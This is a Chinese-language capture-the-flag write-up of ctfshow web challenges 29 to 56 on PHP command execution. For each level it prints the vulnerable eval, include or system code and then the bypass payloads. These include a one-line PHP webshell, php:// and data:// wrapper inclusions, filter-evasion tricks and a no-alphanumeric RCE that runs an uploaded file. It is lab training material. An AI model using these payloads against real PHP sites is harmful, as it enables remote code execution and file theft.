提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
ctfshow-web入门-命令执行
题目
一、做题步骤
1.web29
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.?c=phpinfo();
2.?c=system(‘ls’);
3.?c=system(“tac fla*.php”);
4.?c=system(“cat fla?.php”); 切记看源代码
5.?c=system(“cp fla*.php 1.txt”);
/1.txt
6.上传一句话木马
?c=eval($_POST[1]);
测试:
1=phpinfo();
蚁剑连接
2.web30
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.一句话木马,万能的神啊(蚁剑连接)
2.复制
?c=`cp fla?.??? 1.txt`;
/1.txt
3.web31
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.绕过过滤
?c=echo`tac%09fl*`;
2.一句话木马
?c=eval($_POST[1]);
POST data:
1=system(“tac flag.php”);
3.无参数函数
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
4.一句话木马
?c=eval($_GET[1]);&1=system(“tac flag.php”);
4.web32
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.包含文件,hackbar中LFI有php伪协议的语句
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
%0a是换行符,不加也行
?>是代替;
5.web33
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.文件包含1
?c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.文件包含2
?c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
6.web34
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.文件包含1
?c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
?c=require$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.文件包含2
?c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
3.语言结构:不需要括号
echo
print
isset 返回布尔值(true/false)
unset 销毁
include
require
7.web35
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.文件包含1
?c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
?c=require$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.文件包含2
?c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
8.web36
源代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.文件包含1
?c=include$_POST[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
?c=require$_POST[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
2.文件包含2
?c=require$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
9.web37
源代码:
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
1.data伪协议
?c=data://text/plain,<?php system("tac fla*")?>
10.web38
源代码:
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
1.用=代替php ,短标签
?c=data://text/plain,<?= system("tac fla*")?>
2.base64
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhKiIpPz4=
<?php system("tac fla*")?>的base64为PD9waHAgc3lzdGVtKCJ0YWMgZmxhKiIpPz4=
11.web39
源代码:
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
1.用=代替php ,短标签
?c=data://text/plain,<?= system("tac fla*")?>
12.web40
源代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
1.无参数函数
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
13.web41
源代码:
if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__);
}
?>
或 ( | ) 这个运算符没有被过滤
1.运行脚本rce_or.php
php-cgi.exe -f C:\Users\43844\Desktop\rce_or.php
2.得到rce_or.txt
3.运行exp.py
python exp.py http://a78ea1eb-93ec-4062-a94c-b4832082c67b.challenge.ctf.show/
4.使用命令,得到flag
14.web42
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}
cat flag.php;
cat flag.php%0a
cat flag.php||
cat flag.php%26
cat flag.php%26%26
15.web43
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
tac flag.php%0a
nl flag.php%0a
用tac、nl代替cat
16.web44
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac fla* ||
17.web45
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac$IFS$4fla*||
18.web46
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac<>fla’'g.php||
19.web47
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac<>fla’'g.php||
20.web48
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac<>fla’'g.php||
21.web49
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac<>fla’'g.php||
22.web50
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=tac<>fla’'g.php||
23.web51
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=nl<>fla’'g.php||
看源代码
24.web52
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
?c=nl$IFS/fla’'g||
25.web53
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
echo($c);
$d = system($c);
echo "<br>".$d;
}else{
echo 'no';
}
}else{
highlight_file(__FILE__);
}
?c=ca’‘t${IFS}fla’'g.php
26.web54
源代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
?c=/bin/?at${IFS}f???
27.web55
源代码:
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
1.创建post.html
无字母数字rce
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
2.打开post.html
上传一张图片
3.修改发送信息
头部:POST /?c=.+/???/????????[@-[] HTTP/1.1
信息内容:
#!/bin/sh
ls
#!/bin/sh
cat flag.php
28.web56
同web55一致